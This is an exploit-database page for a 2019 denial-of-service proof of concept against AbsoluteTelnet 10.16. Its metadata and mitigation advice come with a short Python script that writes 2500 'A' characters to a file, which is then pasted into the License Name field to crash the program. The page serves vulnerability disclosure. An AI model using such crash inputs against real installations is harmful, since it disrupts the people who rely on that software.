header-logo
Suggest Exploit
vendor:
AbsoluteTelnet
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: AbsoluteTelnet
Affected Version From: 10.16
Affected Version To: 10.16
Patch Exists: YES
Related CWE: N/A
CPE: //a:celestialsoftware:absolutetelnet:10.16
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

AbsoluteTelnet 10.16 – ‘License name’ Denial of Service (PoC)

AbsoluteTelnet 10.16 is vulnerable to a denial of service attack when a maliciously crafted 'License Name' is entered. This can be exploited by an attacker to crash the application, denying service to legitimate users.

Mitigation:

Upgrade to the latest version of AbsoluteTelnet 10.16 or later.
Source

Exploit-DB raw data:

#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-19
#Vendor Homepage: https://www.celestialsoftware.net/
#Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe
#Tested Version: 10.16
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent.py
#2.- Open AbsoluteTelent.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help" > "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed

cod = "\x41" * 2500

f = open('AbsoluteTelent.txt', 'w')
f.write(cod)
f.close()